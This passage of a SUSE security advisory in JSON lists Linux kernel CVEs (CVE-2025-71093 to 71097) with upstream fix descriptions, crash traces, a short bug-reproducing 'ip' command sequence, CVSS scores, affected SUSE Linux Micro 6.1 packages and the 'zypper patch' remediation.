kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly\n\nThe netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a\nLS_NLA_TYPE_DGID attribute, it is invalid if it does not.\n\nUse the nl parsing logic properly and call nla_parse_deprecated() to fill\nthe nlattrs array and then directly index that array to get the data for\nthe DGID. Just fail if it is NULL.\n\nRemove the for loop searching for the nla, and squash the validation and\nparsing into one function.\n\nFixes an uninitialized read from the stack triggered by userspace if it\ndoes not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE\nquery.\n\n BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]\n BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n hex_byte_pack include/linux/hex.h:13 [inline]\n ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509\n ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633\n pointer+0xc09/0x1bd0 lib/vsprintf.c:2542\n vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930\n vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279\n vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426\n vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465\n vprintk+0x36/0x50 kernel/printk/printk_safe.c:82\n _printk+0x17e/0x1b0 kernel/printk/printk.c:2475\n ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]\n ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141\n rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]\n rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]\n rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x333/0x3d0 net/socket.c:729\n ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671\n __sys_sendmsg+0x1aa/0x300 net/socket.c:2703\n __compat_sys_sendmsg net/compat.c:346 [inline]\n __do_compat_sys_sendmsg net/compat.c:353 [inline]\n __se_compat_sys_sendmsg net/compat.c:350 [inline]\n __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350\n ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306\n do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71096",
"url": "https://www.suse.com/security/cve/CVE-2025-71096"
},
{
"category": "external",
"summary": "SUSE Bug 1256606 for CVE-2025-71096",
"url": "https://bugzilla.suse.com/1256606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71096"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
